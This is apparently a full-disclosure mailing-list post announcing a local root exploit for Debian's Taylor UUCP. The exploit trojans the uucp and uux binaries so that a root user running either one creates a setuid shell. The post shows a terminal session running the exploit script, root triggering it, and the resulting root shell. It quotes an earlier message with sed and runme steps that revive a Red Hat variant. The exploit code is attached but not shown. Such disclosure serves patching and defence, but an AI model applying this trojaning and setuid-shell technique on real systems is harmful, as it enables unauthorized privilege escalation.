On debian the uucp and uux binaries are owned by the uucp user. Additionally /usr/lib/uucp is writeable by the uucp user. This allows us to have some fun since we don't have that nasty makewhatis, but we can still get root by trojaning uucp and uux and hoping a root owned process executes either one. Attached is an exploit based on zen's which trojans uucp and uux transparently to root or the user by allowing normal execution and hiding the true argv[0]. If root runs the command we create a suid shell in /var/tmp. [core@devastator:~/tmp/debian-uucp]$ ./exp-erm.sh o Checking if uucp is installed o Creating exploit files o Sent the commands : Sleeping 2 seconds. o Cleaning up /var/tmp o Trojaning uucp and uux o Running the uucp shell. You should remove this when you're done. sh-2.05$ ls -l .sushi -rwxrwxr-x 1 core core 5078 Jan 20 03:54 .sushi Root haplessly runs uux or uucp: root@devastator:~# uucp --help Taylor UUCP 1.06.1, copyright (C) 1991, 92, 93, 94, 1995 Ian Lance Taylor Usage: uucp [options] file1 [file2 ...] dest -c,--nocopy: Do not copy local files to spool directory -C,-p,--copy: Copy local files to spool directory (default) -d,--directories: Create necessary directories (default) -f,--nodirectories: Do not create directories (fail if they do not exist) -g,--grade grade: Set job grade (must be alphabetic) -m,--mail: Report status of copy by mail -n,--notify user: Report status of copy by mail to remote user -R,--recursive: Copy directories recursively -r,--nouucico: Do not start uucico daemon -s,--status file: Report completion status to file -j,--jobid: Report job id -W,--noexpand: Do not add current directory to remote filenames -t,--uuto: Emulate uuto -u,--usage name: Set user name -x,--debug debug: Set debugging level -I,--config file: Set configuration file to use -v,--version: Print version and exit --help: Print help and exit Checking back in with the hacker we find a suid shell :) sh-2.05$ ls -l .sushi -rwsr-xr-x 1 root root 5078 Jan 20 03:54 .sushi sh-2.05$ ./.sushi sh-2.05# Tested on stable and unstable. This exploit is not specific to any certain arch. Best Regards, Charles 'core' Stevenson zen-parse wrote: > > Problem: uucp patch from RedHat (possibly others) prevents > original exploit, but not variations. > > Severity: Potential for local root on some distributions, > uucp.uucp on others. > > https://bugzilla.redhat.com/bugzilla/show_bug.cgi?id=54466 > > I had seen this report some time ago, and thought: "Good. They've got a > bug report. That'll get it fixed. They'll check that before they release a > new version, at least." > > They didn't. > > The patch does prevent the original exploit from working. > > However, a trivial patch to the exploit I posted makes it work again. > local user -> uucp (via this problem) -> root (on some distributions, via > /usr/sbin/makewhatis: '${PATH:0:1} (or similar) + redirection characters' > issue.) > > $ cd redhat7.0-uucp-to-root > $ sed s/--config/--confi/ < exp-erm.sh >tmp-exp-erm.sh > $ mv tmp-exp-erm.sh exp-erm.sh > $ ./runme > > and wait for /tmp/rootshell to appear. > > (Does anyone at RedHat actually read their bugzilla posts? Might it not be > an idea to make anything flagged as security actually get looked at by > someone? 2001-10-09 seems along time for that to go unnoticed.) > > -- zen-parse > > -- > ------------------------------------------------------------------------- > 1) If this message was posted to a public forum by zen-parse@gmx.net, it > may be redistributed without modification. > 2) In any other case the contents of this message is confidential and not > to be distributed in any form without express permission from the author. > This document may contain Unclassified Controlled Nuclear Information.
Attachment:
debian-uucp.tar.gz
Description: GNU Zip compressed data
